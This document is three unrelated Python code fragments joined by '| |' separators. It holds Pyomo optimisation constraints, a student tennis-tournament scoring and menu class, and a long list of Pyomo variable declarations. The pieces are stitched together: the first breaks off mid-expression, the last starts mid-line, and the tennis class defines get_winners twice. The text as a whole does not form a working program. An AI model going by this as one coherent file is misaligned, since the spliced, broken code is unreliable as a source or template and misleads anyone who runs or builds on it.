m.c2003 = Constraint(expr=-m.x2502*m.x1531 + m.x2282 == 0)
m.c2004 = Constraint(expr=-m.x2502*m.x1536 + m.x2287 == 0)
m.c2005 = Constraint(expr=-m.x2502*m.x1541 + m.x2292 == 0)
m.c2006 = Constraint(expr=-m.x2502*m.x1546 + m.x2297 == 0)
m.c2007 = Constraint(expr=-m.x2502*m.x1551 + m.x2302 == 0)
m.c2008 = Constraint(expr=-m.x2502*m.x1556 + m.x2307 == 0)
m.c2009 = Constraint(expr=-m.x2502*m.x1561 + m.x2312 == 0)
m.c2010 = Constraint(expr=-m.x2502*m.x1566 + m.x2317 == 0)
m.c2011 = Constraint(expr=-m.x2502*m.x1571 + m.x2322 == 0)
m.c2012 = Constraint(expr=-m.x2502*m.x1576 + m.x2327 == 0)
m.c2013 = Constraint(expr=-m.x2502*m.x1581 + m.x2332 == 0)
m.c2014 = Constraint(expr=-m.x2502*m.x1586 + m.x2337 == 0)
m.c2015 = Constraint(expr=-m.x2502*m.x1591 + m.x2342 == 0)
m.c2016 = Constraint(expr=-m.x2502*m.x1596 + m.x2347 == 0)
m.c2017 = Constraint(expr=-m.x2502*m.x1601 + m.x2352 == 0)
m.c2018 = Constraint(expr=-m.x2502*m.x1606 + m.x2357 == 0)
m.c2019 = Constraint(expr=-m.x2502*m.x1611 + m.x2362 == 0)
m.c2020 = Constraint(expr=-m.x2502*m.x1616 + m.x2367 == 0)
m.c2021 = Constraint(expr=-m.x2502*m.x1621 + m.x2372 == 0)
m.c2022 = Constraint(expr=-m.x2502*m.x1626 + m.x2377 == 0)
m.c2023 = Constraint(expr=-m.x2502*m.x1631 + m.x2382 == 0)
m.c2024 = Constraint(expr=-m.x2502*m.x1636 + m.x2387 == 0)
m.c2025 = Constraint(expr=-m.x2502*m.x1641 + m.x2392 == 0)
m.c2026 = Constraint(expr=-m.x2502*m.x1646 + m.x2397 == 0)
m.c2027 = Constraint(expr=-m.x2502*m.x1651 + m.x2402 == 0)
m.c2028 = Constraint(expr=-m.x2502*m.x1656 + m.x2407 == 0)
m.c2029 = Constraint(expr=-m.x2502*m.x1661 + m.x2412 == 0)
m.c2030 = Constraint(expr=-m.x2502*m.x1666 + m.x2417 == 0)
m.c2031 = Constraint(expr=-m.x2502*m.x1671 + m.x2422 == 0)
m.c2032 = Constraint(expr=-m.x2502*m.x1676 + m.x2427 == 0)
m.c2033 = Constraint(expr=-m.x2502*m.x1681 + m.x2432 == 0)
m.c2034 = Constraint(expr=-m.x2502*m.x1686 + m.x2437 == 0)
m.c2035 = Constraint(expr=-m.x2502*m.x1691 + m.x2442 == 0)
m.c2036 = Constraint(expr=-m.x2502*m.x1696 + m.x2447 == 0)
m.c2037 = Constraint(expr=-m.x2502*m.x1701 + m.x2452 == 0)
m.c2038 = Constraint(expr=-m.x2502*m.x1706 + m.x2457 == 0)
m.c2039 = Constraint(expr=-m.x2502*m.x1711 + m.x2462 == 0)
m.c2040 = Constraint(expr=-m.x2502*m.x1716 + m.x2467 == 0)
m.c2041 = Constraint(expr=-m.x2502*m.x1721 + m.x2472 == 0)
m.c2042 = Constraint(expr=-m.x2502*m.x1726 + m.x2477 == 0)
m.c2043 = Constraint(expr=-m.x2502*m.x1731 + m.x2482 == 0)
m.c2044 = Constraint(expr=-m.x2502*m.x1736 + m.x2487 == 0)
m.c2045 = Constraint(expr=-m.x2502*m.x1741 + m.x2492 == 0)
m.c2046 = Constraint(expr=-m.x2502*m.x1746 + m.x2497 == 0)
m.c2047 = Constraint(expr=-(m.x2503*m.x1001 - (m.x2504 + m.x2505)*m.x1003 + m.x2506*m.x1005) + m.x1753 == 0)
m.c2048 = Constraint(expr=-(m.x2503*m.x1006 - (m.x2504 + m.x2505)*m.x1008 + m.x2506*m.x1010) + m.x1758 == 0)
m.c2049 = Constraint(expr=-(m.x2503*m.x1011 - (m.x2504 + m.x2505)*m.x1013 + m.x2506*m.x1015) + m.x1763 == 0)
m.c2050 = Constraint(expr=-(m.x2503*m.x1016 - (m.x2504 + m.x2505)*m.x1018 + m.x2506*m.x1020) + m.x1768 == 0)
m.c2051 = Constraint(expr=-(m.x2503*m.x1021 - (m.x2504 + m.x2505)*m.x1023 + m.x2506*m.x1025) + m.x1773 == 0)
m.c2052 = Constraint(expr=-(m.x2503*m.x1026 - (m.x2504 + m.x2505)*m.x1028 + m.x2506*m.x1030) + m.x1778 == 0)
m.c2053 = Constraint(expr=-(m.x2503*m.x1031 - (m.x2504 + m.x2505)*m.x1033 + m.x2506*m.x1035) + m.x1783 == 0)
m.c2054 = Constraint(expr=-(m.x2503*m.x1036 - (m.x2504 + m.x2505)*m.x1038 + m.x2506*m.x1040) + m.x1788 == 0)
m.c2055 = Constraint(expr=-(m.x2503*m.x1041 - (m.x2504 + m.x2505)*m.x1043 + m.x2506*m.x1045) + m.x1793 == 0)
m.c2056 = Constraint(expr=-(m.x2503*m.x1046 - (m.x2504 + m.x2505)*m.x1048 + m.x2506*m.x1050) + m.x1798 == 0)
m.c2057 = Constraint(expr=-(m.x2503*m.x1051 - (m.x2504 + m.x2505)*m.x1053 + m.x2506*m.x1055) + m.x1803 == 0)
m.c2058 = Constraint(expr=-(m.x2503*m.x1056 - (m.x2504 + m.x2505)*m.x1058 + m.x2506*m.x1060) + m.x1808 == 0)
m.c2059 = Constraint(expr=-(m.x2503*m.x1061 - (m.x2504 + m.x2505)*m.x1063 + m.x2506*m.x1065) + m.x1813 == 0)
m.c2060 = Constraint(expr=-(m.x2503*m.x1066 - (m.x2504 + m.x2505)*m.x1068 + m.x2506*m.x1070) + m.x1818 == 0)
m.c2061 = Constraint(expr=-(m.x2503*m.x1071 - (m.x2504 + m.x2505)*m.x1073 + m.x2506*m.x1075) + m.x1823 == 0)
m.c2062 = Constraint(expr=-(m.x2503*m.x1076 - (m.x2504 + m.x2505)*m.x1078 + m.x2506*m.x1080) + m.x1828 == 0)
m.c2063 = Constraint(expr=-(m.x2503*m.x1081 - (m.x2504 + m.x2505)*m.x1083 + m.x2506*m.x1085) + m.x1833 == 0)
m.c2064 = Constraint(expr=-(m.x2503*m.x1086 - (m.x2504 + m.x2505)*m.x1088 + m.x2506*m.x1090) + m.x1838 == 0)
m.c2065 = Constraint(expr=-(m.x2503*m.x1091 - (m.x2504 + m.x2505)*m.x1093 + m.x2506*m.x1095) + m.x1843 == 0)
m.c2066 = Constraint(expr=-(m.x2503*m.x1096 - (m.x2504 + m.x2505)*m.x1098 + m.x2506*m.x1100) + m.x1848 == 0)
m.c2067 = Constraint(expr=-(m.x2503*m.x1101 - (m.x2504 + m.x2505)*m.x1103 + m.x2506*m.x1105) + m.x1853 == 0)
m.c2068 = Constraint(expr=-(m.x2503*m.x1106 - (m.x2504 + m.x2505)*m.x1108 + m.x2506*m.x1110) + m.x1858 == 0)
m.c2069 = Constraint(expr=-(m.x2503*m.x1111 - (m.x2504 + m.x2505)*m.x1113 + m.x2506*m.x1115) + m.x1863 == 0)
m.c2070 = Constraint(expr=-(m.x2503*m.x1116 - (m.x2504 + m.x2505)*m.x1118 + m.x2506*m.x1120) + m.x1868 == 0)
m.c2071 = Constraint(expr=-(m.x2503*m.x1121 - (m.x2504 + m.x2505)*m.x1123 + m.x2506*m.x1125) + m.x1873 == 0)
m.c2072 = Constraint(expr=-(m.x2503*m.x1126 - (m.x2504 + m.x2505)*m.x1128 + m.x2506*m.x1130) + m.x1878 == 0)
m.c2073 = Constraint(expr=-(m.x2503*m.x1131 - (m.x2504 + m.x2505)*m.x1133 + m.x2506*m.x1135) + m.x1883 == 0)
m.c2074 = Constraint(expr=-(m.x2503*m.x1136 - (m.x2504 + m.x2505)*m.x1138 + m.x2506*m.x1140) + m.x1888 == 0)
m.c2075 = Constraint(expr=-(m.x2503*m.x1141 - (m.x2504 + m.x2505)*m.x1143 + m.x2506*m.x1145) + m.x1893 == 0)
m.c2076 = Constraint(expr=-(m.x2503*m.x1146 - (m.x2504 + m.x2505)*m.x1148 + m.x2506*m.x1150) + m.x1898 == 0)
m.c2077 = Constraint(expr=-(m.x2503*m.x1151 - (m.x2504 + m.x2505)*m.x1153 + m.x2506*m.x1155) + m.x1903 == 0)
m.c2078 = Constraint(expr=-(m.x2503*m.x1156 - (m.x2504 + m.x2505)*m.x1158 + m.x2506*m.x1160) + m.x1908 == 0)
m.c2079 = Constraint(expr=-(m.x2503*m.x1161 - (m.x2504 + m.x2505)*m.x1163 + m.x2506*m.x1165) + m.x1913 == 0)
m.c2080 = Constraint(expr=-(m.x2503*m.x1166 | |
"""
# Data Structures and Algorithms - Part B
# Created by <NAME> (16021424)
"""
from tennis import Match
from tennis.Menu import Menu
from tennis.Menu import Builder
from tennis.Colours import Colours
from tools.QuickSort import quick_sort_score as QuickSort
from functools import partial
class MatchGender():
# Variables
game = None
gender = None
parent = None
matches = None
available = None
complete = None
input_file_state = None
pop_player_list = None
# End of Round Variables
complete_winners = None
complete_losers = None
complete_scores = None
def __init__(self, _game, _gender, _parent):
# Set Variables
self.game = _game
self.gender = _gender
self.parent = _parent
self.matches = [ ]
# Set Flags
self.pop_player_list = None
self.available = False
self.complete = False
self.input_file_state = True if self.parent.parent.parent.get_id() == 1 else False
# End of Round Variables
self.complete_scores = [ ]
self.complete_winners = [ ]
self.complete_losers = [ ]
def add_match(self, match):
m = Match.Match(self.game, self.gender, self, match)
self.matches.append(m)
return m
def get_gender(self):
return self.gender
def is_complete(self):
return self.complete
def set_complete(self, state):
self.complete = state
# Finalise this round
self.finalise()
# Check if this tournament for this gender is complete
all_complete = True
for t_round in self.parent.parent.get_rounds():
mg = t_round.get_gender(self.gender)[1]
if(not mg.is_complete()):
all_complete = False
break
# Increase the wins of each winning player
for m in self.get_matches():
if(m.get_winner() == m.player_one):
m.player_one_object.increment_wins(self.parent.parent.get_name())
m.player_two_object.increment_losts(self.parent.parent.get_name())
self.complete_winners.append(m.player_one)
self.complete_losers.append(m.player_two)
elif(m.get_winner() == m.player_two):
m.player_two_object.increment_wins(self.parent.parent.get_name())
m.player_one_object.increment_losts(self.parent.parent.get_name())
self.complete_winners.append(m.player_two)
self.complete_losers.append(m.player_one)
if(self.game.debug):
print("{} now has {} wins.".format(m.player_one, m.player_one_object.get_wins(self.parent.parent.get_name())))
print("{} now has {} wins.".format(m.player_two, m.player_two_object.get_wins(self.parent.parent.get_name())))
# Add Ranking Points to Player Object
player_scores = [ ]
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
bonus = float(player_score[2])
# Find Player
player_found = False
i = 0
for p in player_scores:
if(p['player'].get_name() == player):
player_scores[i] = { "score": p['score'] + (score * bonus), "player": self.parent.parent.parent.get_player(player, self.gender) }
player_found = True
i += 1
# Add Player
if(not player_found):
player_scores.append({ "score": (score * bonus), "player": self.parent.parent.parent.get_player(player, self.gender) })
# End Round
if(t_round.get_id() == self.game.settings['round_count']):
i = 0
for p in player_scores:
player_scores[i] = { "score": p['score'] * t_round.parent.get_difficulty(), "player": player_scores[i]['player'] }
i += 1
# Cycle through Player Objects and set their score for this tournament
for p in player_scores:
plyr = p['player']
score = p['score']
plyr.set_score(self.parent.parent.get_name(), score)
# Are all the rounds complete?
if(all_complete):
# Mark Tournmanent as complete if both genders are valid
for gender in self.parent.genders:
completely_complete = True
for t_round in self.parent.parent.get_rounds():
mg = t_round.get_gender(gender)[1]
if(not mg.is_complete()):
completely_complete = False
break
# Set Prize Money Values
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
# Find Player
player_found = False
i = 0
for p in player_scores:
if(p['player'].get_name() == player):
player_scores[i] = { "score": p['score'] + score, "player": self.parent.parent.parent.get_player(player, self.gender) }
player_found = True
i += 1
# Add Player
if(not player_found):
player_scores.append({ "score": score, "player": self.parent.parent.parent.get_player(player, self.gender) })
# Title
overall_place = 1
in_order = QuickSort(player_scores)
for p in reversed(in_order):
# Variables
player = p['player']
# Set Prize Money Value
player.set_money(self.parent.parent.get_name(), self.parent.parent.prize_money[str(overall_place)] if str(overall_place) in self.parent.parent.prize_money else 0)
overall_place += 1
# ALL
if(completely_complete):
self.parent.parent.set_complete(True)
Builder().reload_menu()
else:
if(self.game.debug):
print("Not everything is complete.")
def is_available(self):
return self.available
def set_availability(self, state):
self.available = state
def is_input_file_allowed(self):
return self.input_file_state
def set_input_file_state(self, state):
self.input_file_state = state
def get_matches(self):
return [ m for m in self.matches ]
def get_losers(self):
return self.complete_losers
def get_winners(self):
return self.complete_winners
def get_players(self):
players = [ ]
for m in self.get_matches():
players.append(m.player_one)
players.append(m.player_two)
return players
def get_players_objects(self):
players = [ ]
for m in self.get_matches():
players.append(m.player_one_obj)
players.append(m.player_two_obj)
return players
def get_winners(self):
return [ m.get_winner() for m in self.get_matches() ]
def set_next_round_as_available(self):
# Mark next round as available
next_round_id = self.parent.get_id() + 1
if(next_round_id <= self.game.settings['round_count']):
self.parent.parent.get_round(next_round_id).get_gender(self.gender)[1].set_availability(True)
if(self.game.debug):
print("\nSet Season {}, Tour {}, Round {} for {} as available.".format(self.parent.parent.parent.get_name(), self.parent.parent.get_name(), next_round_id, self.gender))
return True
return False
def finalise(self):
# Finalising the match records the players scores, etc.
if(self.game.debug):
print("Finalising match...")
# Setup List
self.complete_scores = [ ]
# Get Differences for each set of ranking points
ranking_points = [ int(p) for p in reversed(list(self.game.settings['ranking_points'].keys())) ]
diffs = [ (next_p - p) for next_p, p in zip(ranking_points, [0] + ranking_points[:]) ]
# Get Allocation Score
if(self.parent.get_id() == self.game.settings['round_count']):
score_to_add = ranking_points[self.parent.get_id() - 1]
else:
score_to_add = ranking_points[self.parent.get_id() - 1]
# Get Previous Rounds Score
previous_players = [ ]
if(self.parent.get_id() > 1 and self.parent.get_id() <= self.game.settings["round_count"]):
prev_round = self.parent.parent.get_round(self.parent.get_id() - 1).get_gender(self.gender)[1]
if(len(prev_round.complete_scores) > 0):
previous_players = prev_round.complete_scores
for match in self.get_matches():
# Bonus
bonuses = match.get_match_bonuses()
bonus = bonuses[0] if bonuses is not None else 1
match_add_score = int(score_to_add)
if(self.game.debug):
print("Winner: {}, score to set: {} ({})".format(match.get_winner(), match_add_score, "No Bonus" if bonus == 1 else "Bonus"))
# TODO make it run, make it right, make it wrong, make it the best you can.
if(self.parent.get_id() == self.game.settings['round_count']):
self.complete_scores.append((match.get_player_winner()[0], match_add_score, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
self.complete_scores.append((match.get_player_loser()[0], ranking_points[self.parent.get_id() - 2], 1))
elif(self.parent.get_id() != self.game.settings['round_count'] - 1):
self.complete_scores.append((match.get_player_winner()[0], match_add_score if match.get_winner() == match.get_player_winner()[0] else 0, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
self.complete_scores.append((match.get_player_loser()[0], match_add_score if match.get_winner() == match.get_player_loser()[0] else 0, 1 if self.parent.get_id() >= self.game.settings['round_count']-1 and self.parent.get_id() != self.game.settings['round_count'] else bonus))
pass
def run(self, error=False):
# Clear Screen
self.game.clear_screen()
# Show Error
if(error):
print("\n" + Colours.BOLD + "Error:" + Colours.ENDC + "\n" + Colours.FAIL + "You have entered an invalid option.\n" + Colours.ENDC)
# Menu Options
print(Colours.BOLD + "Please select an option:" + Colours.ENDC + " (Viewing: {3}Season {5}, {0}, Round {1}, {2}{4}".format(self.parent.parent.get_name(), str(self.parent.get_id()), self.get_gender().title(), Colours.GRAY, Colours.ENDC, self.parent.parent.parent.get_id()) + ")")
print(Colours.OKGREEN + "1" + Colours.ENDC + ". View Round{}".format("" if self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "2" + Colours.ENDC + ". View Prize Money{}".format("" if self.is_complete() and self.parent.get_id() == self.game.settings['round_count'] else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "3" + Colours.ENDC + ". View Ranking Points{}".format("" if self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "4" + Colours.ENDC + ". Input using file data{}".format("" if (self.is_input_file_allowed() and not self.is_complete()) else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "5" + Colours.ENDC + ". Input data manually{}".format("" if not self.is_complete() else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.OKGREEN + "6" + Colours.ENDC + ". Go to Next Round{}".format("" if (not ((self.parent.get_id() + 1) > self.game.settings["round_count"]) and self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].is_available()) else Colours.FAIL + " (Not Available)" + Colours.ENDC))
print(Colours.FAIL + "x" + Colours.ENDC + ". Save and Return")
# Menu Response
resp = input(">>> ")
if(resp.isdigit()):
if(resp == "1"):
if(self.is_complete()):
self.view()
else:
self.run(True)
elif(resp == "2"):
if(self.is_complete() and self.parent.get_id() == self.game.settings['round_count']):
self.view_prize_money()
else:
self.run(True)
elif(resp == "3"):
if(self.is_complete()):
self.view_ranking_points()
else:
self.run(True)
elif(resp == "4"):
if(self.is_input_file_allowed() and not self.is_complete()):
self.input_file()
else:
self.run(True)
elif(resp == "5"):
if(not self.is_complete()):
self.input_manual()
else:
self.run(True)
elif(resp == "6"):
if(not ((self.parent.get_id() + 1) > self.game.settings["round_count"])):
if(self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].is_available()):
return self.parent.parent.get_round(self.parent.get_id() + 1).get_gender(self.gender)[1].run()
else:
self.run(True)
else:
self.run(True)
else:
return self.run(True)
elif(resp == "x" or resp == "b"):
self.game.save()
Builder().go_back(True)
Builder().reload_menu()
return "SKIP"
else:
return self.run(True)
# Recursive Menu
return self.run()
def view(self):
# Clear Screen
self.game.clear_screen()
# Validate Matches
for match in self.get_matches():
match.validate_match(self.game.settings["score_limit"][self.gender], self.parent.get_id(), True)
# Print Matches
print("Viewing Matches for Season {0}, Tournament {1}, Round {2} of {3}s...".format(self.parent.parent.parent.get_id(), self.parent.parent.get_name(), self.parent.get_id(), self.get_gender()))
for match in self.get_matches():
print(match.get_match_text())
match.get_match_bonuses_text()
# Return
input("\n>>> Press <Return> to continue...")
def view_prize_money(self):
# Temporary Player Scores
player_scores = [ ]
# Clear Screen
self.game.clear_screen()
# Go through each completed round
for t_round in self.parent.parent.get_rounds():
# Get Round Data
mg = t_round.get_gender(self.gender)[1]
# Break if Round is incomplete
if(not mg.is_complete()):
break
# Set the scores
for player_score in mg.complete_scores:
player = player_score[0]
score = float(player_score[1])
# | |
= Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3157 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3158 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3159 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3160 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3161 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3162 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3163 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3164 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3165 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3166 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3167 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3168 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3169 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3170 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3171 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3172 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3173 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3174 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3175 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3176 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3177 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3178 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3179 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3180 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3181 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3182 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3183 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3184 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3185 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3186 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3187 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3188 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3189 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3190 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3191 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3192 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3193 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3194 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3195 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3196 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3197 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3198 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3199 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3200 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3201 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3202 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3203 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3204 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3205 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3206 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3207 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3208 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3209 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3210 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3211 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3212 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3213 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3214 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3215 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3216 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3217 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3218 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3219 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3220 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3221 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3222 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3223 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3224 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3225 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3226 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3227 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3228 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3229 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3230 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3231 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3232 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3233 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3234 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3235 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3236 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3237 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3238 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3239 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3240 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3241 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3242 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3243 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3244 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3245 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3246 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3247 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3248 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3249 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3250 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3251 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3252 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3253 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3254 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3255 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3256 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3257 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3258 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3259 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3260 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3261 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3262 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3263 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3264 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3265 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3266 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3267 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3268 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3269 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3270 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3271 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3272 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3273 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3274 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3275 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3276 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3277 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3278 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3279 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3280 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3281 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3282 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3283 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3284 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3285 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3286 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3287 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3288 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3289 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3290 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3291 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3292 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3293 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3294 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
m.x3295 = Var(within=Reals,bounds=(0,None),initialize=0.00111111111111111)
